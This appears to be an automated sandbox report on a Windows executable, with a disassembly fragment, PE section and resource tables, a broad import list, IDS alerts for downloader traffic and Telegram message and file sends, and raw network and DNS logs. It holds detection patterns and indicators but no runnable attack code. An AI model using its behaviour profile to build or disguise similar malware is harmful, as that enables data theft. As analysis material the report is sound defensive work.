Import Hash: 948cc502fe9226992dce9417f952fce3
Instruction
call 00007F4674E170C3h
jmp 00007F4674E169CFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F4674E16BADh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F4674E16B7Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F4674E1976Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F4674E197B8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F4674E197A1h
test byte ptr [ebp+08h], 00000001h
pop ecx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x376d4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10c000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x376d4 | 0x37800 | 632c092f599a5a8d3c2138218753de06 | False | 0.880639428490991 | data | 7.779527864520921 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10c000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x2e999 | data | | | 1.0003457796545348
RT_GROUP_ICON | 0x10b154 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x10b1cc | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x10b1e0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x10b1f4 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x10b208 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x10b2e4 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-02T13:45:07.967448+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 193.122.130.0 | 80 | TCP
2025-01-02T13:45:09.561231+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49704 | 193.122.130.0 | 80 | TCP
2025-01-02T13:45:10.132397+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49706 | 188.114.97.3 | 443 | TCP
2025-01-02T13:45:21.795605+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49707 | 193.122.130.0 | 80 | TCP
2025-01-02T13:45:38.151146+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49818 | 188.114.97.3 | 443 | TCP
2025-01-02T13:45:39.381953+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49825 | 188.114.97.3 | 443 | TCP
2025-01-02T13:45:42.319795+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49841 | 188.114.97.3 | 443 | TCP
2025-01-02T13:45:46.844932+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.5 | 49868 | 149.154.167.220 | 443 | TCP
2025-01-02T13:45:47.901899+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.5 | 49879 | 149.154.167.220 | 443 | TCP
                                                                                                                      Jan 2, 2025 13:45:36.900104046 CET4981280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:36.900193930 CET4981280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:36.904968977 CET8049812193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:37.530512094 CET8049812193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:37.531960011 CET49818443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:37.532028913 CET44349818188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:37.532145977 CET49818443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:37.532547951 CET49818443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:37.532583952 CET44349818188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:37.576886892 CET4981280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.014117002 CET44349818188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.015968084 CET49818443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:38.016016960 CET44349818188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.151170015 CET44349818188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.151216030 CET44349818188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.151429892 CET49818443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:38.151626110 CET49818443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:38.154726028 CET4981280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.155915976 CET4982180192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.159684896 CET8049812193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.159758091 CET4981280192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.160690069 CET8049821193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.160751104 CET4982180192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.160829067 CET4982180192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.165663004 CET8049821193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.732606888 CET8049821193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.780045033 CET4982180192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:38.788127899 CET49825443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:38.788162947 CET44349825188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:38.788275003 CET49825443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:38.788583994 CET49825443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:38.788597107 CET44349825188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.245563030 CET44349825188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.247545958 CET49825443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:39.247562885 CET44349825188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.381985903 CET44349825188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.382044077 CET44349825188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.382184982 CET49825443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:39.382620096 CET49825443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:39.386483908 CET4982180192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:39.387644053 CET4982980192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:39.392479897 CET8049829193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.392559052 CET4982980192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:39.392632008 CET4982980192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:39.397330046 CET8049829193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.404692888 CET8049821193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:39.404756069 CET4982180192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:41.702373981 CET8049829193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:41.713386059 CET49841443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:41.713432074 CET44349841188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:41.713511944 CET49841443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:41.717314005 CET49841443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:41.717343092 CET44349841188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:41.748790026 CET4982980192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:42.192437887 CET44349841188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:42.193913937 CET49841443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:42.193964005 CET44349841188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:42.319806099 CET44349841188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:42.319844961 CET44349841188.114.97.3192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:42.320143938 CET49841443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:42.320471048 CET49841443192.168.2.5188.114.97.3
                                                                                                                      Jan 2, 2025 13:45:42.323318958 CET4982980192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:42.324460030 CET4984780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:42.328378916 CET8049829193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:42.328447104 CET4982980192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:42.329282045 CET8049847193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:42.329356909 CET4984780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:42.329452038 CET4984780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:42.334252119 CET8049847193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:45.782963991 CET8049847193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:45.807538986 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:45.807605028 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:45.807754993 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:45.808149099 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:45.808183908 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:45.826904058 CET4984780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:46.448735952 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:46.448817968 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:46.452686071 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:46.452706099 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:46.453041077 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:46.454663038 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:46.499326944 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:46.844979048 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:46.845046997 CET44349868149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:46.845112085 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:46.845592022 CET49868443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:47.121072054 CET4970780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:47.121330976 CET4984780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:47.121778011 CET49879443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:47.121841908 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:47.121917963 CET49879443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:47.122164011 CET49879443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:47.122204065 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:47.279357910 CET8049847193.122.130.0192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:47.283109903 CET4984780192.168.2.5193.122.130.0
                                                                                                                      Jan 2, 2025 13:45:47.900099039 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:47.901691914 CET49879443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:47.901715994 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:47.901833057 CET49879443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:47.901844978 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:48.286716938 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:48.286787987 CET44349879149.154.167.220192.168.2.5
                                                                                                                      Jan 2, 2025 13:45:48.286876917 CET49879443192.168.2.5149.154.167.220
                                                                                                                      Jan 2, 2025 13:45:48.287328005 CET49879443192.168.2.5149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2025 13:45:04.105060101 CET | 57157 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 13:45:04.111818075 CET | 53 | 57157 | 1.1.1.1 | 192.168.2.5
Jan 2, 2025 13:45:07.959597111 CET | 59599 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 13:45:07.966772079 CET | 53 | 59599 | 1.1.1.1 | 192.168.2.5
Jan 2, 2025 13:45:45.798938036 CET | 60830 | 53 | 192.168.2.5 | 1.1.1.1
